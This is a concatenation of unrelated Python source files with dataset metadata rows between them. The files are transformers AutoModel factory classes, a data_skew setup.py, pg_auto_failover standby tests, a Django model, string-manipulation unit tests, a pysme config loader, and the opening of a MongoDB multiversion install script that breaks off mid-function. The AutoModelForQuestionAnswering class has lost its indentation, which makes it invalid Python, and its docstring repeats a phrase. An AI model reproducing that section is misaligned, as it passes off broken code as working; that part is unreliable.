            "`AutoModelForSequenceClassification.from_config(config)` methods."
        )
    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING, use_model_types=False)
    def from_config(cls, config):
        r"""
        Instantiates one of the model classes of the library---with a sequence classification head---from a
        configuration.
        Note:
            Loading a model from its configuration file does **not** load the model weights. It only affects the
            model's configuration. Use :meth:`~transformers.AutoModelForSequenceClassification.from_pretrained` to load
            the model weights.
        Args:
            config (:class:`~transformers.PretrainedConfig`):
                The model class to instantiate is selected based on the configuration class:
                List options
        Examples::
            >>> from transformers import AutoConfig, AutoModelForSequenceClassification
            >>> # Download configuration from huggingface.co and cache.
            >>> config = AutoConfig.from_pretrained('bert-base-uncased')
            >>> model = AutoModelForSequenceClassification.from_config(config)
        """
        # Dispatch on the exact configuration class (no subclass matching).
        if type(config) in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.keys():
            return MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING[type(config)](config)
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__,
                cls.__name__,
                ", ".join(c.__name__ for c in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.keys()),
            )
        )
    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING)
    @add_start_docstrings(
        "Instantiate one of the model classes of the library---with a sequence classification head---from a "
        "pretrained model.",
        AUTO_MODEL_PRETRAINED_DOCSTRING,
    )
    def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
        r"""
        Examples::
            >>> from transformers import AutoConfig, AutoModelForSequenceClassification
            >>> # Download model and configuration from huggingface.co and cache.
            >>> model = AutoModelForSequenceClassification.from_pretrained('bert-base-uncased')
            >>> # Update configuration during loading
            >>> model = AutoModelForSequenceClassification.from_pretrained('bert-base-uncased', output_attentions=True)
            >>> model.config.output_attentions
            True
            >>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
            >>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
            >>> model = AutoModelForSequenceClassification.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
        """
        config = kwargs.pop("config", None)
        if not isinstance(config, PretrainedConfig):
            # Resolve a config from the name/path; kwargs the config consumes
            # are stripped from what is forwarded to the model below.
            config, kwargs = AutoConfig.from_pretrained(
                pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
            )
        if type(config) in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.keys():
            return MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING[type(config)].from_pretrained(
                pretrained_model_name_or_path, *model_args, config=config, **kwargs
            )
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__,
                cls.__name__,
                ", ".join(c.__name__ for c in MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING.keys()),
            )
        )
class AutoModelForQuestionAnswering:
r"""
This is a generic model class that will be instantiated as one of the model classes of the library---with a
question answering head---when created with the when created with the
:meth:`~transformers.AutoModeForQuestionAnswering.from_pretrained` class method or the
:meth:`~transformers.AutoModelForQuestionAnswering.from_config` class method.
This class cannot be instantiated directly using ``__init__()`` (throws an error).
"""
    def __init__(self):
        # Direct construction is forbidden; use the from_pretrained /
        # from_config factory classmethods instead.
        raise EnvironmentError(
            "AutoModelForQuestionAnswering is designed to be instantiated "
            "using the `AutoModelForQuestionAnswering.from_pretrained(pretrained_model_name_or_path)` or "
            "`AutoModelForQuestionAnswering.from_config(config)` methods."
        )
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_QUESTION_ANSWERING_MAPPING, use_model_types=False)
def from_config(cls, config):
r"""
Instantiates one of the model classes of the library---with a question answering head---from a configuration.
Note:
Loading a model from its configuration file does **not** load the model weights. It only affects the
model's configuration. Use :meth:`~transformers.AutoModelForQuestionAnswering.from_pretrained` to load the
model weights.
Args:
config (:class:`~transformers.PretrainedConfig`):
The model class to instantiate is selected based on the configuration class:
List options
Examples::
>>> from transformers import AutoConfig, AutoModelForQuestionAnswering
>>> # Download configuration from huggingface.co and cache.
>>> config = AutoConfig.from_pretrained('bert-base-uncased')
>>> model = AutoModelForQuestionAnswering.from_config(config)
"""
if type(config) in MODEL_FOR_QUESTION_ANSWERING_MAPPING.keys():
return MODEL_FOR_QUESTION_ANSWERING_MAPPING[type(config)](config)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__,
cls.__name__,
", ".join(c.__name__ for c in MODEL_FOR_QUESTION_ANSWERING_MAPPING.keys()),
)
)
@classmethod
@replace_list_option_in_docstrings(MODEL_FOR_QUESTION_ANSWERING_MAPPING)
@add_start_docstrings(
"Instantiate one of the model classes of the library---with a question answering head---from a "
"pretrained model.",
AUTO_MODEL_PRETRAINED_DOCSTRING,
)
def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
r"""
Examples::
>>> from transformers import AutoConfig, AutoModelForQuestionAnswering
>>> # Download model and configuration from huggingface.co and cache.
>>> model = AutoModelForQuestionAnswering.from_pretrained('bert-base-uncased')
>>> # Update configuration during loading
>>> model = AutoModelForQuestionAnswering.from_pretrained('bert-base-uncased', output_attentions=True)
>>> model.config.output_attentions
True
>>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
>>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
>>> model = AutoModelForQuestionAnswering.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
"""
config = kwargs.pop("config", None)
if not isinstance(config, PretrainedConfig):
config, kwargs = AutoConfig.from_pretrained(
pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
)
if type(config) in MODEL_FOR_QUESTION_ANSWERING_MAPPING.keys():
return MODEL_FOR_QUESTION_ANSWERING_MAPPING[type(config)].from_pretrained(
pretrained_model_name_or_path, *model_args, config=config, **kwargs
)
raise ValueError(
"Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
"Model type should be one of {}.".format(
config.__class__,
cls.__name__,
", ".join(c.__name__ for c in MODEL_FOR_QUESTION_ANSWERING_MAPPING.keys()),
)
)
class AutoModelForTokenClassification:
    r"""
    This is a generic model class that will be instantiated as one of the model classes of the library---with a token
    classification head---when created with the
    :meth:`~transformers.AutoModelForTokenClassification.from_pretrained` class method or the
    :meth:`~transformers.AutoModelForTokenClassification.from_config` class method.

    This class cannot be instantiated directly using ``__init__()`` (throws an error).
    """

    def __init__(self):
        raise EnvironmentError(
            "AutoModelForTokenClassification is designed to be instantiated "
            "using the `AutoModelForTokenClassification.from_pretrained(pretrained_model_name_or_path)` or "
            "`AutoModelForTokenClassification.from_config(config)` methods."
        )

    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING, use_model_types=False)
    def from_config(cls, config):
        r"""
        Instantiates one of the model classes of the library---with a token classification head---from a configuration.

        Note:
            Loading a model from its configuration file does **not** load the model weights. It only affects the
            model's configuration. Use :meth:`~transformers.AutoModelForTokenClassification.from_pretrained` to load
            the model weights.

        Args:
            config (:class:`~transformers.PretrainedConfig`):
                The model class to instantiate is selected based on the configuration class:

                List options

        Examples::

            >>> from transformers import AutoConfig, AutoModelForTokenClassification
            >>> # Download configuration from huggingface.co and cache.
            >>> config = AutoConfig.from_pretrained('bert-base-uncased')
            >>> model = AutoModelForTokenClassification.from_config(config)
        """
        # Dispatch on the *exact* configuration class; subclasses of a supported
        # config are deliberately not matched (hence type(), not isinstance()).
        if type(config) in MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING:
            return MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING[type(config)](config)
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__,
                cls.__name__,
                ", ".join(c.__name__ for c in MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING.keys()),
            )
        )

    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING)
    @add_start_docstrings(
        "Instantiate one of the model classes of the library---with a token classification head---from a "
        "pretrained model.",
        AUTO_MODEL_PRETRAINED_DOCSTRING,
    )
    def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
        r"""
        Examples::

            >>> from transformers import AutoConfig, AutoModelForTokenClassification

            >>> # Download model and configuration from huggingface.co and cache.
            >>> model = AutoModelForTokenClassification.from_pretrained('bert-base-uncased')

            >>> # Update configuration during loading
            >>> model = AutoModelForTokenClassification.from_pretrained('bert-base-uncased', output_attentions=True)
            >>> model.config.output_attentions
            True

            >>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
            >>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
            >>> model = AutoModelForTokenClassification.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
        """
        # An explicitly passed config wins; otherwise infer it from the model
        # name/path, keeping any kwargs the config constructor did not consume.
        config = kwargs.pop("config", None)
        if not isinstance(config, PretrainedConfig):
            config, kwargs = AutoConfig.from_pretrained(
                pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
            )
        if type(config) in MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING:
            return MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING[type(config)].from_pretrained(
                pretrained_model_name_or_path, *model_args, config=config, **kwargs
            )
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__,
                cls.__name__,
                ", ".join(c.__name__ for c in MODEL_FOR_TOKEN_CLASSIFICATION_MAPPING.keys()),
            )
        )
class AutoModelForMultipleChoice:
    r"""
    This is a generic model class that will be instantiated as one of the model classes of the library---with a
    multiple choice classification head---when created with the
    :meth:`~transformers.AutoModelForMultipleChoice.from_pretrained` class method or the
    :meth:`~transformers.AutoModelForMultipleChoice.from_config` class method.

    This class cannot be instantiated directly using ``__init__()`` (throws an error).
    """

    def __init__(self):
        raise EnvironmentError(
            "AutoModelForMultipleChoice is designed to be instantiated "
            "using the `AutoModelForMultipleChoice.from_pretrained(pretrained_model_name_or_path)` or "
            "`AutoModelForMultipleChoice.from_config(config)` methods."
        )

    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_MULTIPLE_CHOICE_MAPPING, use_model_types=False)
    def from_config(cls, config):
        r"""
        Instantiates one of the model classes of the library---with a multiple choice classification head---from a
        configuration.

        Note:
            Loading a model from its configuration file does **not** load the model weights. It only affects the
            model's configuration. Use :meth:`~transformers.AutoModelForMultipleChoice.from_pretrained` to load the
            model weights.

        Args:
            config (:class:`~transformers.PretrainedConfig`):
                The model class to instantiate is selected based on the configuration class:

                List options

        Examples::

            >>> from transformers import AutoConfig, AutoModelForMultipleChoice
            >>> # Download configuration from huggingface.co and cache.
            >>> config = AutoConfig.from_pretrained('bert-base-uncased')
            >>> model = AutoModelForMultipleChoice.from_config(config)
        """
        # Dispatch on the *exact* configuration class; subclasses of a supported
        # config are deliberately not matched (hence type(), not isinstance()).
        if type(config) in MODEL_FOR_MULTIPLE_CHOICE_MAPPING:
            return MODEL_FOR_MULTIPLE_CHOICE_MAPPING[type(config)](config)
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__,
                cls.__name__,
                ", ".join(c.__name__ for c in MODEL_FOR_MULTIPLE_CHOICE_MAPPING.keys()),
            )
        )

    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_MULTIPLE_CHOICE_MAPPING)
    @add_start_docstrings(
        "Instantiate one of the model classes of the library---with a multiple choice classification head---from a "
        "pretrained model.",
        AUTO_MODEL_PRETRAINED_DOCSTRING,
    )
    def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
        r"""
        Examples::

            >>> from transformers import AutoConfig, AutoModelForMultipleChoice

            >>> # Download model and configuration from huggingface.co and cache.
            >>> model = AutoModelForMultipleChoice.from_pretrained('bert-base-uncased')

            >>> # Update configuration during loading
            >>> model = AutoModelForMultipleChoice.from_pretrained('bert-base-uncased', output_attentions=True)
            >>> model.config.output_attentions
            True

            >>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
            >>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
            >>> model = AutoModelForMultipleChoice.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
        """
        # An explicitly passed config wins; otherwise infer it from the model
        # name/path, keeping any kwargs the config constructor did not consume.
        config = kwargs.pop("config", None)
        if not isinstance(config, PretrainedConfig):
            config, kwargs = AutoConfig.from_pretrained(
                pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
            )
        if type(config) in MODEL_FOR_MULTIPLE_CHOICE_MAPPING:
            return MODEL_FOR_MULTIPLE_CHOICE_MAPPING[type(config)].from_pretrained(
                pretrained_model_name_or_path, *model_args, config=config, **kwargs
            )
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__,
                cls.__name__,
                ", ".join(c.__name__ for c in MODEL_FOR_MULTIPLE_CHOICE_MAPPING.keys()),
            )
        )
class AutoModelForNextSentencePrediction:
    r"""
    This is a generic model class that will be instantiated as one of the model classes of the library---with a
    next sentence prediction head---when created with the
    :meth:`~transformers.AutoModelForNextSentencePrediction.from_pretrained` class method or the
    :meth:`~transformers.AutoModelForNextSentencePrediction.from_config` class method.

    This class cannot be instantiated directly using ``__init__()`` (throws an error).
    """

    def __init__(self):
        raise EnvironmentError(
            "AutoModelForNextSentencePrediction is designed to be instantiated "
            "using the `AutoModelForNextSentencePrediction.from_pretrained(pretrained_model_name_or_path)` or "
            "`AutoModelForNextSentencePrediction.from_config(config)` methods."
        )

    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING, use_model_types=False)
    def from_config(cls, config):
        r"""
        Instantiates one of the model classes of the library---with a next sentence prediction head---from a
        configuration.

        Note:
            Loading a model from its configuration file does **not** load the model weights. It only affects the
            model's configuration. Use :meth:`~transformers.AutoModelForNextSentencePrediction.from_pretrained` to load
            the model weights.

        Args:
            config (:class:`~transformers.PretrainedConfig`):
                The model class to instantiate is selected based on the configuration class:

                List options

        Examples::

            >>> from transformers import AutoConfig, AutoModelForNextSentencePrediction
            >>> # Download configuration from huggingface.co and cache.
            >>> config = AutoConfig.from_pretrained('bert-base-uncased')
            >>> model = AutoModelForNextSentencePrediction.from_config(config)
        """
        # Dispatch on the *exact* configuration class; subclasses of a supported
        # config are deliberately not matched (hence type(), not isinstance()).
        if type(config) in MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING:
            return MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING[type(config)](config)
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__,
                cls.__name__,
                ", ".join(c.__name__ for c in MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING.keys()),
            )
        )

    @classmethod
    @replace_list_option_in_docstrings(MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING)
    @add_start_docstrings(
        "Instantiate one of the model classes of the library---with a next sentence prediction head---from a "
        "pretrained model.",
        AUTO_MODEL_PRETRAINED_DOCSTRING,
    )
    def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):
        r"""
        Examples::

            >>> from transformers import AutoConfig, AutoModelForNextSentencePrediction

            >>> # Download model and configuration from huggingface.co and cache.
            >>> model = AutoModelForNextSentencePrediction.from_pretrained('bert-base-uncased')

            >>> # Update configuration during loading
            >>> model = AutoModelForNextSentencePrediction.from_pretrained('bert-base-uncased', output_attentions=True)
            >>> model.config.output_attentions
            True

            >>> # Loading from a TF checkpoint file instead of a PyTorch model (slower)
            >>> config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')
            >>> model = AutoModelForNextSentencePrediction.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)
        """
        # An explicitly passed config wins; otherwise infer it from the model
        # name/path, keeping any kwargs the config constructor did not consume.
        config = kwargs.pop("config", None)
        if not isinstance(config, PretrainedConfig):
            config, kwargs = AutoConfig.from_pretrained(
                pretrained_model_name_or_path, return_unused_kwargs=True, **kwargs
            )
        if type(config) in MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING:
            return MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING[type(config)].from_pretrained(
                pretrained_model_name_or_path, *model_args, config=config, **kwargs
            )
        raise ValueError(
            "Unrecognized configuration class {} for this kind of AutoModel: {}.\n"
            "Model type should be one of {}.".format(
                config.__class__,
                cls.__name__,
                ", ".join(c.__name__ for c in MODEL_FOR_NEXT_SENTENCE_PREDICTION_MAPPING.keys()),
            )
        )
| 44.597458
| 147
| 0.680122
|
4a0a25c94a0cd026d1780c79edf7777d2cdbd6aa
| 327
|
py
|
Python
|
setup.py
|
BrownSparkles/data-skew
|
f0ff5ccc6b30c147fe0727866af0eef70af76d33
|
[
"MIT"
] | null | null | null |
setup.py
|
BrownSparkles/data-skew
|
f0ff5ccc6b30c147fe0727866af0eef70af76d33
|
[
"MIT"
] | 1
|
2019-11-07T06:02:20.000Z
|
2019-11-07T06:02:20.000Z
|
setup.py
|
BrownSparkles/data-skew
|
f0ff5ccc6b30c147fe0727866af0eef70af76d33
|
[
"MIT"
] | 1
|
2019-11-07T06:04:44.000Z
|
2019-11-07T06:04:44.000Z
|
from setuptools import setup

# Packaging metadata for the data_skew distribution (setuptools-based build).
setup(name='data_skew',
      version='0.1.1',
      description='Create DataFrames based on a required bias',
      url='http://github.com/JVoogt/data-skew',
      author='J Voogt',
      author_email='jvoogt1@outlook.com',
      license='MIT',
      packages=['data_skew'],
      # zip_safe=False: install the package unpacked rather than as a zipped egg.
      zip_safe=False)
| 29.727273
| 63
| 0.64526
|
4a0a26615c315c56b24f9b391a3eed2287cf2652
| 2,424
|
py
|
Python
|
tests/test_multi_standbys.py
|
Spread0x/pg_auto_failover
|
e471d140a528e277c0272a6a5a307be8d2050ac4
|
[
"PostgreSQL"
] | null | null | null |
tests/test_multi_standbys.py
|
Spread0x/pg_auto_failover
|
e471d140a528e277c0272a6a5a307be8d2050ac4
|
[
"PostgreSQL"
] | null | null | null |
tests/test_multi_standbys.py
|
Spread0x/pg_auto_failover
|
e471d140a528e277c0272a6a5a307be8d2050ac4
|
[
"PostgreSQL"
] | null | null | null |
import pgautofailover_utils as pgautofailover
from nose.tools import *
import time
# Module-level handles shared by the ordered test functions below; populated
# by setup_module() and the test_* functions as the cluster is built up.
cluster = None
monitor = None
node1 = None
node2 = None
def setup_module():
    """Create the pg_auto_failover test cluster shared by every test here."""
    global cluster
    cluster = pgautofailover.Cluster()
def teardown_module():
    # Destroy the whole cluster (monitor and data nodes) created by the tests.
    cluster.destroy()
def test_000_create_monitor():
    """Start the monitor node and wait for its Postgres instance to be up."""
    global monitor
    monitor = cluster.create_monitor("/tmp/multi_standby/monitor")
    monitor.run()
    monitor.wait_until_pg_is_running()
def test_001_init_primary():
    """Create the first data node; alone it must reach the "single" state."""
    global node1
    node1 = cluster.create_datanode("/tmp/multi_standby/node1")
    node1.create()
    node1.run()
    assert node1.wait_until_state(target_state="single")
def test_002_candidate_priority():
    """candidate-priority defaults to 100 and rejects invalid values."""
    assert node1.get_candidate_priority() == 100
    # a negative priority is invalid and must leave the setting unchanged
    assert not node1.set_candidate_priority(-1)
    assert node1.get_candidate_priority() == 100
    assert node1.set_candidate_priority(99)
    assert node1.get_candidate_priority() == 99
def test_003_replication_quorum():
    """replication-quorum accepts only boolean strings and round-trips."""
    assert node1.get_replication_quorum()
    # a non-boolean value is rejected and the setting stays unchanged
    assert not node1.set_replication_quorum("wrong quorum")
    assert node1.get_replication_quorum()
    assert node1.set_replication_quorum("false")
    assert not node1.get_replication_quorum()
    assert node1.set_replication_quorum("true")
    assert node1.get_replication_quorum()
def test_004_add_standby():
    """Add a standby; it must reach "secondary" and node1 become "primary"."""
    # the next test wants to set number_sync_standbys to 2
    # so we need at least 3 standbys to allow that
    # NOTE(review): only one standby is created here, while the comment above
    # says three are needed — confirm against test_005's expectations.
    global node2
    node2 = cluster.create_datanode("/tmp/multi_standby/node2")
    node2.create()
    node2.run()
    assert node2.wait_until_state(target_state="secondary")
    assert node1.wait_until_state(target_state="primary")
def test_005_number_sync_standbys():
    """number-sync-standbys validation: -1 and unsatisfiable values are
    rejected; 0 and 1 are accepted and round-trip."""
    print()
    assert node1.get_number_sync_standbys() == 1
    # negative values are invalid
    assert not node1.set_number_sync_standbys(-1)
    assert node1.get_number_sync_standbys() == 1
    # not enough standbys exist to satisfy 2 sync standbys
    assert not node1.set_number_sync_standbys(2)
    assert node1.get_number_sync_standbys() == 1
    print("set number_sync_standbys = 0")
    assert node1.set_number_sync_standbys(0)
    assert node1.get_number_sync_standbys() == 0
    print("synchronous_standby_names = '%s'" %
          node1.get_synchronous_standby_names())
    print("set number_sync_standbys = 1")
    assert node1.set_number_sync_standbys(1)
    assert node1.get_number_sync_standbys() == 1
    print("synchronous_standby_names = '%s'" %
          node1.get_synchronous_standby_names())
| 29.560976
| 66
| 0.743399
|
4a0a2677c3ab0402a1a40cdc665b805385914010
| 890
|
py
|
Python
|
substrabac/substrapp/models/algo.py
|
GuillaumeCisco/substra-backend
|
777ec0cfc10a1aad34cccba449e4923c20786d32
|
[
"Apache-2.0"
] | null | null | null |
substrabac/substrapp/models/algo.py
|
GuillaumeCisco/substra-backend
|
777ec0cfc10a1aad34cccba449e4923c20786d32
|
[
"Apache-2.0"
] | null | null | null |
substrabac/substrapp/models/algo.py
|
GuillaumeCisco/substra-backend
|
777ec0cfc10a1aad34cccba449e4923c20786d32
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
from substrapp.utils import get_hash
def upload_to(instance, filename):
    """Return the storage path for an algo's files: ``algos/<pk>/<filename>``."""
    return f"algos/{instance.pk}/{filename}"
class Algo(models.Model):
    """Algorithm storage table: uploaded archive, description and a validation flag."""

    # sha-of-file primary key, filled in automatically on first save()
    pkhash = models.CharField(primary_key=True, max_length=64, blank=True)
    file = models.FileField(upload_to=upload_to, max_length=500)  # path max length to 500 instead of default 100
    description = models.FileField(upload_to=upload_to, max_length=500)  # path max length to 500 instead of default 100
    validated = models.BooleanField(default=False)

    def save(self, *args, **kwargs):
        """Derive the primary key from the file's hash when missing, then save."""
        self.pkhash = self.pkhash or get_hash(self.file)
        super().save(*args, **kwargs)

    def __str__(self):
        return f"Algo with pkhash {self.pkhash} with validated {self.validated}"
| 35.6
| 120
| 0.695506
|
4a0a26dc72683f331443908321acfa3588b8594f
| 1,933
|
py
|
Python
|
testStringManipulation.py
|
MartenMoti/TextCompression
|
7d96c9e0bc2c226d6675ba8ac1e315c379b4dd06
|
[
"MIT"
] | 4
|
2017-06-07T18:42:05.000Z
|
2020-03-05T07:56:12.000Z
|
testStringManipulation.py
|
MartenMoti/TextCompression
|
7d96c9e0bc2c226d6675ba8ac1e315c379b4dd06
|
[
"MIT"
] | null | null | null |
testStringManipulation.py
|
MartenMoti/TextCompression
|
7d96c9e0bc2c226d6675ba8ac1e315c379b4dd06
|
[
"MIT"
] | null | null | null |
import unittest
import stringManipulation
from stringManipulation import *
class TestSplitIntoWords(unittest.TestCase):
    """SplitIntoWords must break a sentence apart on whitespace."""

    def testGeneric(self):
        sentence = "The quick brown fox jumps over the lazy dog."
        expected = [
            "The", "quick", "brown", "fox", "jumps",
            "over", "the", "lazy", "dog.",
        ]
        self.assertEqual(SplitIntoWords(sentence), expected)
class TestRemoveUppercase(unittest.TestCase):
    """RemoveUppercase must lower-case letters wherever they appear."""

    def testFirstLetter(self):
        self.assertEqual(RemoveUppercase("Word"), "word")

    def testLastLetter(self):
        self.assertEqual(RemoveUppercase("worD"), "word")

    def testNoLetters(self):
        self.assertEqual(RemoveUppercase("word"), "word")

    def testAllLetters(self):
        self.assertEqual(RemoveUppercase("WORD"), "word")
class TestRemovePunctuation(unittest.TestCase):
    """RemovePunctuation must strip punctuation from either end of a word."""

    def testNoPunctuation(self):
        self.assertEqual(RemovePunctuation("marten"), "marten")

    def testFirstCharPunctuation(self):
        self.assertEqual(RemovePunctuation("(marten"), "marten")

    def testLastCharPunctaution(self):
        self.assertEqual(RemovePunctuation("marten."), "marten")

    def testFirstAndLastCharPunctuation(self):
        self.assertEqual(RemovePunctuation("(marten)"), "marten")
class TestCharAtPosIsPunctuationChar(unittest.TestCase):
    """CharAtPosIsPunctuationChar must flag punctuation at a given index."""

    punctuationChars = ['(', '{', '[', ')', '}', ']', '.', ',', '?', '!', '*']

    def testEmptyString(self):
        # An empty string has no characters, so no position holds punctuation.
        self.assertFalse(CharAtPosIsPunctuationChar("", 0))

    def testPunctationChar(self):
        # Embed each punctuation mark at index 2 and expect it to be detected.
        for mark in self.punctuationChars:
            self.assertTrue(CharAtPosIsPunctuationChar("wo" + mark + "rd", 2))

    def testNoPunctuationChar(self):
        self.assertFalse(CharAtPosIsPunctuationChar("nopunctuation", 5))
| 39.44898
| 91
| 0.70357
|
4a0a26e607527bf69974fb2567325de93cb158c0
| 1,371
|
py
|
Python
|
src/pysme/config.py
|
AWehrhahn/SME
|
542e880ed779381f7cbbaaacb59475fa6a6d3537
|
[
"BSD-3-Clause"
] | 14
|
2019-06-26T18:43:09.000Z
|
2022-03-12T00:53:42.000Z
|
src/pysme/config.py
|
AWehrhahn/SME
|
542e880ed779381f7cbbaaacb59475fa6a6d3537
|
[
"BSD-3-Clause"
] | 10
|
2020-03-01T15:21:23.000Z
|
2021-09-01T15:28:37.000Z
|
src/pysme/config.py
|
AWehrhahn/SME
|
542e880ed779381f7cbbaaacb59475fa6a6d3537
|
[
"BSD-3-Clause"
] | 6
|
2019-03-01T15:25:24.000Z
|
2022-03-30T10:26:33.000Z
|
"""
Handle the Json configuration file
At the moment it is only used for the LargeFileStorage
"""
import functools
import json
import logging

from os.path import dirname, exists, expanduser, join
# Module-level logger named after this module, per logging convention.
logger = logging.getLogger(__name__)
def _requires_load(func):
def func_new(self, *args, **kwargs):
if self._cfg is None:
self.load()
return func(self, *args, **kwargs)
return func_new
class Config:
    """JSON-backed configuration store (currently used by LargeFileStorage).

    The configuration is loaded lazily on first item access. When the user's
    configuration file does not exist, the packaged ``config_default.json``
    is used instead.
    """

    def __init__(self, fname="~/.sme/config.json"):
        self.filename = fname
        # Parsed configuration dict; None until load() has run.
        self._cfg = None
        if not exists(self.filename):
            # Fall back to the default configuration shipped with the package.
            # (Typo fix: "cconfiguration" -> "configuration"; lazy %-style
            # args avoid formatting when INFO logging is disabled.)
            logger.info(
                "No configuration file found at %s, using default values instead",
                self.filename,
            )
            self.filename = join(dirname(__file__), "config_default.json")

    @property
    def filename(self):
        """Expanded path of the configuration file, as a string."""
        return str(self._filename)

    @filename.setter
    def filename(self, value):
        # Expand "~" so later open() calls get an absolute user path.
        self._filename = expanduser(value)

    @_requires_load
    def __getitem__(self, key):
        return self._cfg[key]

    @_requires_load
    def __setitem__(self, key, value):
        # Only updates the in-memory copy; call save() to persist.
        self._cfg[key] = value

    def load(self):
        """Read and cache the JSON configuration; return the resulting dict."""
        with open(self._filename, "r") as f:
            self._cfg = json.load(f)
        return self._cfg

    @_requires_load
    def save(self):
        """Write the (possibly modified) configuration back to disk."""
        with open(self._filename, "w") as f:
            json.dump(self._cfg, f)
| 24.052632
| 96
| 0.618527
|
4a0a26f9cdb035799d8ba839e2a66ff7f7a4f685
| 14,674
|
py
|
Python
|
buildscripts/setup_multiversion_mongodb.py
|
EdwardPrentice/wrongo
|
1e7c9136f5fab7040b5bd5df51b4946876625c88
|
[
"Apache-2.0"
] | 12
|
2020-04-27T21:31:57.000Z
|
2020-12-13T13:25:06.000Z
|
buildscripts/setup_multiversion_mongodb.py
|
EdwardPrentice/wrongo
|
1e7c9136f5fab7040b5bd5df51b4946876625c88
|
[
"Apache-2.0"
] | 2
|
2021-03-26T00:01:11.000Z
|
2021-03-26T00:02:19.000Z
|
buildscripts/setup_multiversion_mongodb.py
|
EdwardPrentice/wrongo
|
1e7c9136f5fab7040b5bd5df51b4946876625c88
|
[
"Apache-2.0"
] | 4
|
2021-03-27T14:40:25.000Z
|
2022-03-19T20:52:41.000Z
|
#!/usr/bin/env python
import re
import sys
import os
import tempfile
import subprocess
import json
import urlparse
import tarfile
import signal
import threading
import traceback
import shutil
import errno
from contextlib import closing
# To ensure it exists on the system
import zipfile
#
# Useful script for installing multiple versions of MongoDB on a machine
# Only really tested/works on Linux.
#
def dump_stacks(signal, frame):
    # SIGUSR1 handler: print a stack trace for every live thread so hangs can
    # be diagnosed without killing the process. (Python 2 print statements.)
    print "======================================"
    print "DUMPING STACKS due to SIGUSR1 signal"
    print "======================================"
    threads = threading.enumerate()
    print "Total Threads: " + str(len(threads))
    # sys._current_frames() maps thread id -> topmost frame for that thread.
    for id, stack in sys._current_frames().items():
        print "Thread %d" % (id)
        print "".join(traceback.format_stack(stack))
    print "======================================"
def get_version_parts(version, for_sorting=False):
    """Split a version string such as '2.6.0-rc1' into numeric components.

    With for_sorting=True the result is padded/weighted so that lists like
    [2, 6, 0, -100] (an RC) and [2, 6, 0, 0] (the GA release) compare in
    ascending release order.
    """
    RC_OFFSET = -100
    parts = re.split(r"\.|-", version)

    # Old binary archives carried a trailing "-pre" (pre-SERVER-17782); drop it.
    if parts[-1] == "pre":
